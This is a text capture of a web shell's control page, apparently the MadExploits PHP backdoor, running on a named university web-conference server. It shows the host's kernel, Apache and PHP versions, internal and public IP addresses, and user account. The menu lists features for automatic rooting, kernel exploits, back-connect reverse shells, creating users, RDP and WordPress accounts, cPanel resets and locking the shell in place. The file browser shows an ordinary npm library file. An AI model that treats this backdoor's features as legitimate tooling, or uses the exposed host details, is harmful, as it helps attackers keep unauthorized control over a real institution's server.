Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.188.106.47
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
node_modules /
pacote /
lib /
util /
[ HOME SHELL ]
Name
Size
Permission
Action
cache-key.js
129
B
-rw-r--r--
finished.js
419
B
-rw-r--r--
git.js
8.15
KB
-rw-r--r--
opt-check.js
1.21
KB
-rw-r--r--
pack-dir.js
1.03
KB
-rw-r--r--
proclog.js
340
B
-rw-r--r--
read-json.js
481
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : read-json.js
'use strict' module.exports = function (content) { // Code also yanked from read-package-json. function stripBOM (content) { content = content.toString() // Remove byte order marker. This catches EF BB BF (the UTF-8 BOM) // because the buffer-to-string conversion in `fs.readFileSync()` // translates it to FEFF, the UTF-16 BOM. if (content.charCodeAt(0) === 0xFEFF) return content.slice(1) return content } return JSON.parse(stripBOM(content)) }
Close